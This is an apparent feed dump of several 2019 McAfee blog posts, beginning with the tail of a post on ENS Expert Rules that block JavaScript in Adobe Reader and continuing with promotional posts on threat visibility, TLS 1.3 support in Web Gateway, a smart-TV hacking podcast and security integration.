Include OBJECT_NAME { -v “AcroRd32.exe”}

}

Target {

Match SECTION {

Include OBJECT_NAME { -v “EScript.api” }

}

}

}

The table below shows how the above four Expert Rules line up in the Mitre Att&ck matrix.

Conclusion

There are many more rules which can be created within Exploit Prevention (part of McAfee’s ENS Threat Prevention) and they can be customized depending on the customer’s environment and requirements. For example, the Expert Rule which blocks JavaScript Execution within Adobe Reader will be of no use if an organization does not use “Adobe Reader” software. To fully utilize this feature, we recommend our customers read the following guides:

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/27000/PD27227/en_US/ens_1053_rg_ExpertRules_0-00_en-us.pdf

https://kc.mcafee.com/corporate/index?page=content&id=KB89677

 

Disclaimer: The expert rules used here as examples can cause a significant number of False Positives in some environments, hence we recommend those rules to be explicitly applied only in an environment where better visibility of above (or similar) events at granular level is required.

Acknowledgement:

The author would like to thank following colleagues for their help and inputs authoring this blog.

  • Oliver Devane
  • Abhishek Karnik
  • Cedric Cochin

The post Using Expert Rules in ENS to Prevent Malicious Exploits appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/feed/ 0
It’s About Time: Cybersecurity Insights, Visibility, and Prioritization https://www.mcafee.com/blogs/enterprise/its-about-time-cybersecurity-insights-visibility-and-prioritization/ https://www.mcafee.com/blogs/enterprise/its-about-time-cybersecurity-insights-visibility-and-prioritization/#respond Thu, 24 Oct 2019 20:23:23 +0000 https://securingtomorrow.mcafee.com/?p=97164

As McAfee Chief Executive Officer Chris Young said in his 2019 MPOWER Cybersecurity Summit keynote address, time is the most valuable resource that we all share. But time isn’t always on our side – especially when it comes to cybersecurity. “Time is the one constant that we cannot change. It’s the one constraint that we […]

The post It’s About Time: Cybersecurity Insights, Visibility, and Prioritization appeared first on McAfee Blogs.

]]>

As McAfee Chief Executive Officer Chris Young said in his 2019 MPOWER Cybersecurity Summit keynote address, time is the most valuable resource that we all share. But time isn’t always on our side – especially when it comes to cybersecurity.

“Time is the one constant that we cannot change. It’s the one constraint that we cannot ignore. Every second counts,” Young said. “… Our adversaries are using time to their advantage. It’s the single greatest weapon they have. It’s taken over the language of our industry. Persistence. Dwell time. Used to describe the time the work that our adversaries do as they run up the clock until they try to exfiltrate our most sensitive information. Versus ransomware, which applies time pressure to run down the clock. If you don’t pay the ransom you’ll lose your data forever. Zero-day attacks. Mean time to detect. Mean time to respond. These are just a few of the many, many examples of the way time is woven into the fabric of our industry.”

Time is a major challenge for organizations attempting to keep pace with cyber threats that are rapidly increasing in volume and complexity. Elevated efficiency is cybersecurity’s counterpunch against agile and elusive adversaries weaponizing time. Organizations that constantly find themselves in reactive mode struggle to maintain staff efficiency—but time and resources can be saved by using improved visibility and prioritization to get ahead of the threat curve.

The findings of an ESG paper commissioned by McAfee concurred: “Organizations want more visibility into cyber-risks so they can tailor and prioritize their threat response and risk remediation actions in alignment with threats that may hit them,” said Jon Oltsik, ESG fellow. “Many firms want to be more proactive but do not have the resources and talent to execute.”

Better cybersecurity intelligence and insights can enable organizations to assume a more proactive cybersecurity program without dramatically upgrading resources and talent.

Better Visibility Through Next Generation Open Architecture

Modern adversaries are using next-generation tools, tactics and techniques to evade traditional reactive security systems. The next generation of open cyberthreat identification, investigation, and response capabilities paired with human and artificial intelligence can enable organizations to answer key questions about how to respond to threats. Open architecture can enable security teams to add their own expertise and analytics, empowering insight into the high-impact threats that matter. Security analysts will need the right technology to do the analysis, a combination of human expertise and the most advanced artificial intelligence and machine-learning capabilities that provide insight as to which actions to take.

The diversity of the raw materials an organization uses matters. If you only have one type of sensor, such as endpoint, you’re limited in what you can see. Gaining insight requires the ability to look at a wide range of capabilities from traditional on-premise environments to the cloud. Sensors should cover on-premise, perimeter, network, endpoint, and cloud environments. From the data gathered by these sensors, security teams can then extract context, detecting the characteristics, structure, and behavior of suspicious activity. Efficiencies are empowered through diverse telemetry at scale.

Prioritization: Decoding the DNA of Cyber Threats

“We and the rest of the cybersecurity industry have to move beyond the hash,“ said Steve Grobman, senior vice president and chief technology officer. “Features are a lot like markers in DNA and biology. By understanding the markers and characteristics, we can understand the structure, the behavior. We can understand what a threat is even if we’ve never seen it before. We can basically see the characteristics of a threat we’ve never seen before and have a very good understanding of what it actually is.”

Most security teams are constrained by the available data and traditional indicators of compromise such as hashtags and IP addresses. An open architecture consisting of a variety of sensors provides the capability to gather more and richer information on a threat’s DNA.

The goal goes beyond a simple patch or remedy. It’s about being better able to understand the unknown through improved data and intelligence. To enhance efficiency in dealing with the things that matter. The threats that are inherently difficult to detect. The threats that are engineered to target you.

By gaining this understanding, you’ll be more able to answer strategic questions such as:

  • Am I protected from this threat?
  • What do I need on my platform in to defend against this threat?
  • What is the technology?
  • What is the content?
  • What is the configuration I need to defend myself?
  • Was I protected when this threat impacted my environment on that very first day or the day that threat emerged?
  • What did I need to have zero-day protection?
  • Did I have the right real-protect model?

Intelligence that helps answer these questions can provide insight into not only how a threat fared against one organization’s security but how a security plan can proactively prepare for next-generation threats.

Anticipating Next-Generation Threats

Understanding threats is not just about protection but also anticipation, both of threats in your environment and on a global scale. Improved insights can leave organizations with a complete view of how a threat is impacting their environment.

Decoding the DNA of threats through an expanded variety of sensors can help organizations recognize and anticipate the next generation of threats:

  • Using machine-learning algorithm that recognizes potentially malicious activity, extracts characteristics and recognizes its similarities to threats we’ve seen before.
  • Finding outliers that allow us to find things that have uncommon characteristics.
  • Finding things that appear to be engineered for things in your environment. The fact that this only in your environment and it has characteristics that really look different from anything we’ve ever seen before. That tells us you really need to pop this to the top of your stack of investigation priorities because this could be targeting you.
  • Identifying targeted attacks by mapping threats tied to specific industrial sectors and being able to cluster the highest level of intensity by sector.
  • Separating the noise from the signal.
  • Triaging the priority and raising the urgency on threats critical to your organization.

Gaining cybersecurity efficiency via visibility and prioritization isn’t only about gathering richer data. It’s also about having the right technology to do the analysis. It’s not just about being able to identify the things that matter, it’s about being able to take action with your current security staff. It’s about saving time against an adversary using time as a weapon.

Read more on how the McAfee MVISION Insights platform’s integration into the McAfee architecture provides better intelligence capable of empowering better insights

The post It’s About Time: Cybersecurity Insights, Visibility, and Prioritization appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/its-about-time-cybersecurity-insights-visibility-and-prioritization/feed/ 0
TLS 1.3 and McAfee Web Gateway https://www.mcafee.com/blogs/enterprise/tls-1-3-and-mcafee-web-gateway/ https://www.mcafee.com/blogs/enterprise/tls-1-3-and-mcafee-web-gateway/#comments Wed, 23 Oct 2019 14:00:08 +0000 https://securingtomorrow.mcafee.com/?p=97159

With the introduction of TLS 1.3 in 2018, IETF’s goal was (and is) to make the Internet a safer and more secure place. Legacy technologies such as the RSA key exchange have been phased out now. Replacing it is a much safer Diffie-Hellman key exchange. There are two main benefits to this method: not only […]

The post TLS 1.3 and McAfee Web Gateway appeared first on McAfee Blogs.

]]>

With the introduction of TLS 1.3 in 2018, IETF’s goal was (and is) to make the Internet a safer and more secure place.

Legacy technologies such as the RSA key exchange have been phased out now. Replacing it is a much safer Diffie-Hellman key exchange. There are two main benefits to this method: not only is perfect forward secrecy reached, but also a decryption after the fact is no longer possible, since the relevant key cannot be recalculated. The usage of elliptic curve ciphers introduces greater efficiency—as the same strengths can be reached with a smaller key, essentially the encryption will use fewer resources.

To support a safer Internet, adoption of TLS 1.3 is key. TLS 1.3 offers better security posture than its previous versions.

It is important that a web gateway supports TLS 1.3 to ensure secure connection. McAfee Web Gateway version 8.2.0 supports TLS 1.3 in a bi-directional fashion. This helps organizations to ensure that the connection from the internal client side has the same level of security as the connection on the outbound side (towards the server).

In the reverse proxy scenario, McAfee Web Gateway with TLS 1.3 helps secure Internet traffic for cloud infrastructures such as Azure and AWS, even when they don’t support TLS 1.3 themselves.

The timely adoption of TLS 1.3, as previously seen with HTTP/2, will enable customers to act at the speed of cloud and make cloud usage as safe and secure as possible. To find out more, please view this whitepaper.

The post TLS 1.3 and McAfee Web Gateway appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/tls-1-3-and-mcafee-web-gateway/feed/ 1
Could a Streaming Device Help Hackers Hijack Your TV? https://www.mcafee.com/blogs/consumer/hackable/could-a-streaming-device-help-hackers-hijack-your-tv/ https://www.mcafee.com/blogs/consumer/hackable/could-a-streaming-device-help-hackers-hijack-your-tv/#respond Tue, 22 Oct 2019 17:43:36 +0000 https://securingtomorrow.mcafee.com/?p=97154

Streaming devices make dumb TVs smart and smart TVs, well, smarter. But as loyal “Hackable?” listeners know, the smarter something is, the more likely it is that it can be hacked. So does that mean that a hacker can interrupt your binge-watching? Or do something worse? On the latest “Hackable?” Geoff sets up his smart […]

The post Could a Streaming Device Help Hackers Hijack Your TV? appeared first on McAfee Blogs.

]]>

Streaming devices make dumb TVs smart and smart TVs, well, smarter. But as loyal “Hackable?” listeners know, the smarter something is, the more likely it is that it can be hacked. So does that mean that a hacker can interrupt your binge-watching? Or do something worse?

On the latest “Hackable?” Geoff sets up his smart TV and streaming devices in the studio and learns just how much damage hacker Craig Young can do from thousands of miles away. Listen and find out how surprisingly vulnerable smart TVs and streaming devices are!
Listen now to the award-winning podcast “Hackable?”.

 

The post Could a Streaming Device Help Hackers Hijack Your TV? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/hackable/could-a-streaming-device-help-hackers-hijack-your-tv/feed/ 0
Increasing Value with Security Integration https://www.mcafee.com/blogs/enterprise/increasing-value-with-security-integration/ https://www.mcafee.com/blogs/enterprise/increasing-value-with-security-integration/#respond Tue, 22 Oct 2019 15:00:35 +0000 https://securingtomorrow.mcafee.com/?p=97140

What would your security team do with an extra 62 days? According to a recent study by IDC, that’s the amount of time the average-sized security team can expect to regain by addressing a lack of security management integration. With just 12 percent of respondents currently using an end-to-end management suite—and with 14 percent completely […]

The post Increasing Value with Security Integration appeared first on McAfee Blogs.

]]>

What would your security team do with an extra 62 days?

According to a recent study by IDC, that’s the amount of time the average-sized security team can expect to regain by addressing a lack of security management integration. With just 12 percent of respondents currently using an end-to-end management suite—and with 14 percent completely reliant on ad hoc “solutions”—there’s plenty of room for improvement.

The study, “Security Integration and Automation: The Keys to Unlocking Security Value,” found that businesses who addressed lack of integration saw three main business benefits: Efficiency, Cost Reduction and Improved Staff Retention. If your business chose to do the same, which goal would your team spend its 62 days working toward?

Increasing Efficiency

When asked what concerns limited their ability to improve IT security capabilities, 44% reported security was too busy with routine operations, and 37 percent cited high levels of demand for new business services.

If these teams had an extra 62 days, it could afford them the free